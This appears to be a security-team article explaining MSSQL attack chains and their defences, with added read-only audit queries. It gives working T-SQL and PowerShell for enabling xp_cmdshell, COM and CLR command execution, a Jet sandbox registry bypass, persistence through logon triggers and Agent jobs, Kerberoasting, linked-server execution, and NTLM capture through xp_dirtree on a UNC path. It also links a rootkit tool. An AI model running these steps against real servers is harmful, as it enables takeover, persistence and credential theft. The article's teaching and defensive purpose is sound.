Uncovering MSSQL Attack Chains: Stored Procedures, COM, CLR, Triggers, and Lateral Movement

This article provides a comprehensive technical analysis of MSSQL attack vectors—including vulnerable stored procedures, COM automation, CLR exploitation, sandbox bypass, trigger abuse, proxy jobs, Kerberoasting, and linked servers—detailing prerequisites, step‑by‑step T‑SQL examples, mitigation recommendations, and overall impact on database security.

Huolala Safety Emergency Response Center

Privilege Escalation via Stored Procedures

Prerequisites: DBA privileges and the target stored‑procedure DLL must be present.

Overview: Stored procedures run with the owner’s privileges. High‑privilege procedures such as xp_cmdshell can execute system commands. If disabled, attackers may re‑register the procedure with a custom DLL.

Enable xp_cmdshell (if allowed):

EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;

Check existence:

SELECT COUNT(*) FROM master.dbo.sysobjects WHERE xtype = 'x' AND name = 'xp_cmdshell';

Re‑register a missing procedure:

EXEC master.dbo.sp_addextendedproc 'xp_cmdshell', 'c:\xplog70.dll';

Other dangerous extended procedures include xp_regwrite, xp_regread, xp_dirtree, xp_subdirs.

Mitigation: Revoke execution rights for all users except dbo, disable or delete the procedures, and remove PUBLIC permissions on any remaining extended procedures.

COM Automation Procedures

Prerequisites: DBA privileges and the required OLE component.

Overview: sp_oacreate and sp_oamethod allow creation of COM objects and invocation of their methods, enabling command execution.

Write output to a file:

DECLARE @shell INT;
EXEC sp_oacreate 'wscript.shell', @shell OUTPUT;
EXEC sp_oamethod @shell, 'run', NULL, 'c:\windows\system32\cmd.exe /c whoami > c:\test.txt';

Capture command output directly:

DECLARE @obj INT, @obj2 INT, @obj3 INT, @out VARCHAR(8000);
EXEC sp_OACreate 'WScript.Shell', @obj OUTPUT;
EXEC sp_OAMethod @obj, 'exec', @obj2 OUTPUT, 'C:\Windows\System32\cmd.exe /c whoami';
EXEC sp_OAMethod @obj2, 'StdOut', @obj3 OUTPUT;
EXEC sp_OAMethod @obj3, 'ReadAll', @out OUTPUT;
SELECT @out;

Mitigation: Disable OLE automation procedures, allow only verified COM components, and restrict PUBLIC execution rights.

CLR Exploitation

Prerequisites: DBA privileges, matching MSSQL and .NET versions, and the database marked TRUSTWORTHY.

Overview: Enabling CLR permits execution of arbitrary C# code inside the database. Attackers can load unsafe assemblies as stored procedures and run commands without writing files to disk.

Enable CLR and create an unsafe assembly:

EXEC sp_configure 'show advanced options',1; RECONFIGURE;
EXEC sp_configure 'clr enabled',1; RECONFIGURE;
ALTER DATABASE master SET TRUSTWORTHY ON;
CREATE ASSEMBLY UserDefinedClrAssembly FROM 0x... WITH PERMISSION_SET = UNSAFE;
CREATE PROCEDURE dbo.ExecCommand @cmd NVARCHAR(MAX) AS EXTERNAL NAME UserDefinedClrAssembly.StoredProcedures.ExecCommand;
EXEC dbo.ExecCommand 'whoami /all';

Tool example: https://github.com/EPICROUTERSS/MSSQL-Fileless-Rootkit-WarSQLKit

Mitigation: Avoid loading unsafe assemblies, enforce signed assemblies, and disable CLR when not required.

Sandbox Mode Bypass (Access)

Prerequisites: Jet OLEDB driver, DBA privileges, and ability to use xp_regwrite.

Overview: The Access sandbox blocks dangerous functions. By setting the registry key SandBoxMode to 0, the sandbox is disabled and the shell function in an MDB file can execute commands.

Disable sandbox and run a command via OpenRowset:

EXEC master..xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0;
EXEC sp_configure 'show advanced options',1; RECONFIGURE;
EXEC sp_configure 'Ad Hoc Distributed Queries',1; RECONFIGURE;
SELECT * FROM OpenRowset('Microsoft.Jet.OLEDB.4.0',';Database=c:\windows\system32\ias\ias.mdb','SELECT shell("net user > c:\test.txt")');

Mitigation: Remove MDB files, disable the Jet driver, and revoke xp_regwrite permissions.
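The four techniques above all hinge on a handful of server options, TRUSTWORTHY flags and PUBLIC grants, so one read-only audit pass covers them. This is an added example, not code from the original article; it uses only the standard catalog views named in the comments and is meant to be run by a sysadmin, with section 3 evaluated in each user database.

```sql
-- Added example (not from the original article). Read-only audit of the
-- settings and grants that xp_cmdshell, sp_OA*, CLR and OpenRowset rely on.

-- 1. Server options. Any value_in_use = 1 here needs a business reason;
--    'clr strict security' is the exception and should be 1 (SQL 2017+).
SELECT name, value_in_use
FROM sys.configurations
WHERE name IN ('xp_cmdshell', 'Ole Automation Procedures', 'clr enabled',
               'clr strict security', 'Ad Hoc Distributed Queries');

-- 2. TRUSTWORTHY databases. Combined with a sysadmin owner this is what
--    lets an UNSAFE assembly run with sysadmin rights (CLR section above).
--    msdb is TRUSTWORTHY by default, so only the rest are reported.
SELECT name, SUSER_SNAME(owner_sid) AS owner_login
FROM sys.databases
WHERE is_trustworthy_on = 1 AND name <> 'msdb';

-- 3. User assemblies in the current database and their permission set.
--    EXTERNAL_ACCESS or UNSAFE should be signed and justified.
SELECT name, permission_set_desc, create_date, modify_date
FROM sys.assemblies
WHERE is_user_defined = 1;

-- 4. Extended procedures in master that PUBLIC can still execute.
--    The mitigation above is to remove exactly these grants.
SELECT o.name, dp.state_desc
FROM master.sys.objects AS o
JOIN master.sys.database_permissions AS dp ON dp.major_id = o.object_id
JOIN master.sys.database_principals AS pr ON pr.principal_id = dp.grantee_principal_id
WHERE o.type = 'X'                       -- extended stored procedure
  AND dp.class = 1                       -- object-level permission
  AND pr.name = 'public'
  AND dp.permission_name = 'EXECUTE'
  AND dp.state_desc LIKE 'GRANT%';

-- 5. Re-registration check. Built-in extended procedures are recorded by
--    bare DLL name (xplog70.dll, xpstar.dll ...); an entry that carries a
--    path, or is not Microsoft-shipped, was added with sp_addextendedproc.
SELECT xp.name, xp.dll_name
FROM master.sys.extended_procedures AS xp
WHERE xp.is_ms_shipped = 0
   OR xp.dll_name LIKE '%\%';
```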

Persistence Mechanisms

Triggers

Prerequisite: High‑privilege account capable of creating server‑level triggers.

Overview: Triggers run T‑SQL after specific events. A login trigger can execute xp_cmdshell each time a privileged account logs in.

Login trigger example:

CREATE TRIGGER test ON ALL SERVER FOR LOGON AS
BEGIN
    IF ORIGINAL_LOGIN() = 'sa'
    BEGIN
        EXEC xp_cmdshell 'whoami > c:\whoami.txt';
    END
END;
GO

Mitigation: Restrict trigger creation to trusted principals, use signed modules, and limit external connections.
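To hunt for the persistence just described, enumerate every server-scoped trigger with its body and flag bodies that reach outside the engine. This is an added example, not from the original article; the trigger name `test` in the commented clean-up lines is the one from the example above.

```sql
-- Added example (not from the original article): list server-level
-- (LOGON and DDL) triggers, when they were created or changed, and whether
-- the body calls into the OS or registry, as the logon trigger above does.
SELECT tr.name,
       te.type_desc                   AS fires_on,     -- LOGON, CREATE_LOGIN ...
       tr.is_disabled,
       tr.create_date,
       tr.modify_date,
       CASE WHEN m.definition IS NULL THEN 'REVIEW (encrypted body)'
            WHEN m.definition LIKE '%xp_cmdshell%'
              OR m.definition LIKE '%sp_OACreate%'
              OR m.definition LIKE '%sp_OAMethod%'
              OR m.definition LIKE '%xp_regwrite%'
              OR m.definition LIKE '%sp_add_job%'
            THEN 'REVIEW' ELSE 'ok' END AS verdict,
       m.definition
FROM sys.server_triggers       AS tr
JOIN sys.server_trigger_events AS te ON te.object_id = tr.object_id
JOIN sys.server_sql_modules    AS m  ON m.object_id  = tr.object_id
ORDER BY tr.modify_date DESC;

-- A hostile logon trigger fires on every ordinary connection, including an
-- administrator's. The Dedicated Admin Connection (sqlcmd -A, or the
-- "admin:" server-name prefix) does not fire logon triggers; connect that
-- way, then disable or drop the trigger from the example above:
-- DISABLE TRIGGER [test] ON ALL SERVER;
-- DROP TRIGGER [test] ON ALL SERVER;
```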

Proxy Jobs

Prerequisites: SQL Agent enabled, CLR enabled, trusted database, and permission to create jobs.

Overview: SQL Agent proxy jobs can run OS commands via CmdExec or PowerShell steps, providing a stealthy persistence channel.

Job creation example (CmdExec):

EXEC master.dbo.xp_servicecontrol 'start','SQLSERVERAGENT';
USE msdb;
EXEC sp_add_job 'myjob';
EXEC sp_add_jobstep NULL,'myjob',NULL,'1','CmdExec','cmd.exe /c "whoami > C:\whoami.txt"';
EXEC sp_add_jobserver NULL,'myjob',@@SERVERNAME;
EXEC sp_start_job 'myjob';

Mitigation: Disable CLR, restrict job access to external resources, and run jobs under low‑privilege service accounts.
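The job steps that matter for the persistence above are the ones whose subsystem leaves T-SQL, together with the account they run as and who is allowed to create them. This is an added example, not from the original article; it reads only msdb's job tables and the standard DMVs.

```sql
-- Added example (not from the original article): inventory Agent job steps
-- that leave T-SQL, which is the channel the proxy-job persistence above uses.
SELECT j.name                       AS job_name,
       SUSER_SNAME(j.owner_sid)     AS job_owner,
       j.enabled,
       s.step_id,
       s.subsystem,                 -- CmdExec, PowerShell, ActiveScripting
       COALESCE(p.name, '<SQL Agent service account>') AS runs_as,
       s.command,
       j.date_created,
       j.date_modified
FROM msdb.dbo.sysjobs         AS j
JOIN msdb.dbo.sysjobsteps     AS s ON s.job_id = j.job_id
LEFT JOIN msdb.dbo.sysproxies AS p ON p.proxy_id = s.proxy_id
WHERE s.subsystem IN ('CmdExec', 'PowerShell', 'ActiveScripting')
ORDER BY j.date_modified DESC;

-- Steps without a proxy run as the Agent service account, so this is the
-- Windows identity such a job inherits (the mitigation above asks for a
-- low-privilege account here).
SELECT servicename, service_account, status_desc
FROM sys.dm_server_services
WHERE servicename LIKE 'SQL Server Agent%';

-- Who can create jobs at all: sysadmin plus members of msdb's SQLAgent*
-- roles. An unexpected member here is how a job appears without sysadmin.
SELECT r.name AS role_name, m.name AS member_name
FROM msdb.sys.database_role_members AS rm
JOIN msdb.sys.database_principals   AS r ON r.principal_id = rm.role_principal_id
JOIN msdb.sys.database_principals   AS m ON m.principal_id = rm.member_principal_id
WHERE r.name LIKE 'SQLAgent%';
```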

Lateral Movement

Kerberoasting MSSQL SPNs

Prerequisites: MSSQL service registered with an SPN under a domain account and RC4 encryption.

Overview: Attackers request service tickets for the SPN, extract the ticket's encrypted portion (keyed by the service account's NTLM hash when RC4 is used), and brute‑force it offline (e.g., with Hashcat) to recover the account password. Compromised credentials can be used for further privilege escalation.

Enumeration and hash extraction example:

setspn -T ignite -Q */*
Import-Module .\GetUserSPNs.ps1
Import-Module .\PowerView.ps1
Get-NetUser -SPN
Import-Module .\Invoke-Kerberoast.ps1
Invoke-Kerberoast -OutputFormat Hashcat

Mitigation: Use stronger encryption (AES) and avoid unnecessary SPN registration for MSSQL.

Linked Servers (SqlLink)

Prerequisite: A linked server is configured.

Overview: Linked servers allow cross‑database queries. If the linked server trusts local credentials, attackers can execute remote commands via xp_cmdshell or run arbitrary T‑SQL using EXEC (...) AT.

Remote command execution example:

EXECUTE AS LOGIN = 'username';
EXEC ('sp_configure ''show advanced options'',1; RECONFIGURE;') AT linkname;
EXEC ('sp_configure ''xp_cmdshell'',1; RECONFIGURE;') AT linkname;
EXEC ('xp_cmdshell ''whoami'';') AT linkname;

In a domain environment, NTLM relay attacks can be performed by triggering xp_dirtree on a UNC path and capturing the hash with ntlmrelayx from Impacket:

SELECT 1 FROM openquery('sqllinked-hostname','SELECT 1; EXEC master..xp_dirtree ''\\UNC\share''');

Mitigation: Disable linked servers, restrict permissions on linked servers, and monitor for unusual remote queries.
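Whether EXEC (...) AT and OPENQUERY work against a link, and whose identity arrives at the far end, is all visible in two catalog views, so a review of linked-server trust can be done from T-SQL. This is an added example, not from the original article; `<linkname>` and `<login>` in the commented hardening lines are placeholders for the link and login from the example above.

```sql
-- Added example (not from the original article): review what each linked
-- server lets a local principal do remotely. EXEC (...) AT needs
-- is_rpc_out_enabled = 1 and OPENQUERY needs is_data_access_enabled = 1;
-- the login mapping decides which identity is used on the remote instance.
SELECT s.name                        AS linked_server,
       s.product,
       s.provider,
       s.data_source,
       s.is_rpc_out_enabled,
       s.is_data_access_enabled,
       CASE WHEN ll.local_principal_id = 0 THEN '<all logins>'
            ELSE SUSER_NAME(ll.local_principal_id) END AS local_login,
       CASE WHEN ll.uses_self_credential = 1 THEN '<same credentials>'
            WHEN ll.remote_name IS NULL       THEN '<connection not made>'
            ELSE ll.remote_name END             AS remote_login,
       ll.modify_date
FROM sys.servers            AS s
LEFT JOIN sys.linked_logins AS ll ON ll.server_id = s.server_id
WHERE s.is_linked = 1
ORDER BY s.name, local_login;
-- Rows to act on: '<all logins>' mapped to a fixed, privileged remote_login
-- (every local user becomes that account remotely), and self-credential
-- mappings to a server where the same login is sysadmin.

-- Hardening that keeps OPENQUERY working but stops EXEC (...) AT:
-- EXEC sp_serveroption @server = N'<linkname>', @optname = N'rpc out', @optvalue = N'false';
-- Removing the mapping that the EXECUTE AS LOGIN step above relies on:
-- EXEC sp_droplinkedsrvlogin @rmtsrvname = N'<linkname>', @locallogin = N'<login>';
```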

Tags: security, MSSQL, Stored Procedure, CLR, Attack Chain, COM Automation
Written by

Huolala Safety Emergency Response Center

Official public account of the Huolala Safety Emergency Response Center (LLSRC)
